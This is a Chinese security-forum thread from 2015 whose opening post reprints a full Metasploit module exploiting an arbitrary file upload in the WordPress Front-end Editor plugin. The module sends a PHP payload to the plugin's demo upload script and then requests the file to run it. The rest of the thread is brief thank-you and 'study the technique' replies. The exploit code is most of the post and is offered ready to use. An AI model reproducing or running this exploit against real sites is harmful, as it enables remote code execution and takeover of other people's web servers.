请选择 进入手机版 | 继续访问电脑版
查看: 4478|回复: 193

Wordpress Front-end Editor上传漏洞

[复制链接]
  • TA的每日心情
    擦汗
    昨天 10:22
  • 签到天数: 814 天

    [LV.10]以坛为家III

    发表于 2015-6-18 20:41:51 | 显示全部楼层 |阅读模式
    Description:
    The Wordpress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type.


    [PHP] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include Msf::HTTP::Wordpress
      include Msf::Exploit::FileDropper
     
      def initialize(info = {})
        super(update_info(
          info,
          'Name'           => 'Wordpress Front-end Editor File Upload',
          'Description'    => %q{
              The Wordpress Front-end Editor plugin contains an authenticated file upload
              vulnerability. We can upload arbitrary files to the upload folder, because
              the plugin also uses it's own file upload mechanism instead of the wordpress
              api it's possible to upload any file type.
          },
          'Author'         =>
            [
              'Sammy', # Vulnerability discovery
              'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['OSVDB', '83637'],
              ['WPVDB', '7569'],
              ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
            ],
          'Privileged'     => false,
          'Platform'       => ['php'],
          'Arch'           => ARCH_PHP,
          'Targets'        => [['Front-End Editor 2.2.1', {}]],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Jul 04 2012'))
      end
     
      def check
        check_plugin_version_from_readme('front-end-editor', '2.3')
      end
     
      def exploit
        print_status("#{peer} - Trying to upload payload")
        filename = "#{rand_text_alpha_lower(5)}.php"
     
        print_status("#{peer} - Uploading payload")
        res = send_request_cgi(
          'method'   => 'POST',
          'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
          'ctype'    => 'application/octet-stream',
          'headers'  => {
            'X-File-Name' => "#{filename}"
          },
          'data' => payload.encoded
        )
     
        if res
          if res.code == 200
            register_files_for_cleanup(filename)
          else
            fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
          end
        else
          fail_with(Failure::Unknown, 'Server did not respond in an expected way')
        end
     
        print_status("#{peer} - Calling uploaded file #{filename}")
        send_request_cgi(
          { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
          5
        )
      end
    end
    [2015-06-18]  #

    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-2-7 13:38
  • 签到天数: 124 天

    [LV.7]常住居民III

    发表于 2015-6-19 19:01:39 | 显示全部楼层
    好深奥的样子
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-26 23:05:23 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 09:52:56 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 13:53:58 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 02:09:41 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 06:02:08 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 23:24:23 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 05:32:16 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 00:22:37 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表